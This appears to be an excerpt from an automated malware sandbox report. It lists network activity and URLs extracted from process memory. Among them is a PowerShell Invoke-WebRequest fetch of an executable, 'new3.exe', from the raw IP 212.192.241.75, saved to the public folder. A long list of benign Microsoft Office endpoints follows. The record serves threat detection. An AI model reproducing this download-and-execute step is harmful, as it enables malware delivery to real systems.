00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /sam/new3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 212.192.241.75Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: unknownTCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpString found in binary or memory: http://212.192.241.75
            Source: PowerShell_transcript.061544.RzyXj49c.20211027181911.txt.1.drString found in binary or memory: http://212.192.241.75/sam/new3.exe
            Source: powershell.exe, 00000001.00000002.355847421.0000000002B50000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.356485936.0000000002C48000.00000004.00000020.sdmp, powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.355784668.0000000002B40000.00000004.00000040.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exe-OutFile$env:public
            Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exenvoke-WebRequest
            Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpString found in binary or memory: http://212.192.241.754
            Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: eVJOpc.exe, eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000000A.00000000.383527191.00000000089CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openxmlformatm
            Source: powershell.exe, 00000001.00000002.357492979.00000000049D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.aadrm.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.cortana.ai
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.office.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.onedrive.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://augloop.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cdn.entity.
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cortana.ai
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cortana.ai/api
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://cr.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dev.cortana.ai
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://directory.services.
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: powershell.exe, 00000001.00000002.358997121.0000000004DD2000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmpString found in binary or memory: https://go.micros
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://graph.windows.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://graph.windows.net/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://login.windows.local
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://management.azure.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://management.azure.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://messaging.office.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ncus.contentsync.
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ncus.pagecontentsync.
            Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://officeapps.live.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://onedrive.live.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://osi.office.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office365.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office365.com/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://pages.store.office.com/review/query
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://roaming.edog.
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://settings.outlook.com
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://staging.cortana.ai
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drString found in binary or memory: https://tasks.office.com
